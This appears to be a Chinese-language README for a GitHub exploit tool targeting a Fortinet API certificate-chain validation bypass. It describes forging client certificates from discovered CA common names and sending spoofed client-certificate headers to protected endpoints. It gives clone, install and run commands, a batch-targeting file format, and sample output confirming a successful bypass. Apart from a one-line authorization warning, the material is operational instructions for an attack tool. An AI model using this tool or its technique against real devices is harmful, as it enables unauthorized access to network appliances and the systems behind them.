利用 Fortinet API 中证书链验证绕过漏洞。该脚本自动从多个来源发现有效的 Common Name (CN),生成伪造的客户端证书,并使用 X-SSL-CLIENT-VERIFY 和 X-SSL-CLIENT-CERT 请求头向受保护的端点发起请求。
!!!重要:仅可在您拥有明确测试授权的系统上使用。
requestscryptographyurllib3openssl(用于通过 TLS 握手进行扩展的 CA 发现)# 克隆项目
git clone https://github.com/wa6n3r/CVE-2026-35616
cd CVE-2026-35616
# 安装依赖项
pip install -r requirements.txt
## 使用方法
# 基本运行
python3 exploit.py
# 指定目标和端口
python3 exploit.py <TARGET_IP> [PORT]
# 示例:
python3 exploit.py 192.168.1.100
python3 exploit.py 10.0.0.50 8443
# 目标文件格式(targets.txt)
进行批量测试时,请创建 targets.txt 文件,每行一个目标地址:
192.168.1.100:443
10.0.0.50:8443
fortigate.internal
# 输出文件
成功执行后,脚本会创建:
results/bypass_results_<TARGET>_<PORT>_<TIMESTAMP>.json — 详细的 JSON 格式报告,包含:
所使用的 CN
每个端点的响应状态
用于分析的响应前缀
# 输出结构
[ wa6n3r ] ◆ GH: github.com/wa6n3r ◆ WEB: wa6n3r.com
[*] CVE-2026-35616 目标:https://192.168.1.100:443
[*] 正在从多个来源发现 CA CN...
[•] TLS CA CN: 'fortinet-ca2'
[•] ZTNA CA CN: 'support'
[*] 找到 2 个候选 CN:fortinet-ca2, support
[*] 正在测试 2 个候选 CN 的绕过情况...
[+] CN='support' | HTTP 200 | retval=1 | 已确认绕过
[*] 正在使用 CN='support' 探测所有 cert_chain 端点...
GET /api/v1/system/capabilities
HTTP 200: '{"result": {"retval": 1, ...}}'
[+] 结果已保存至:results/bypass_results_192.168.1.100_443_20260101_120000.json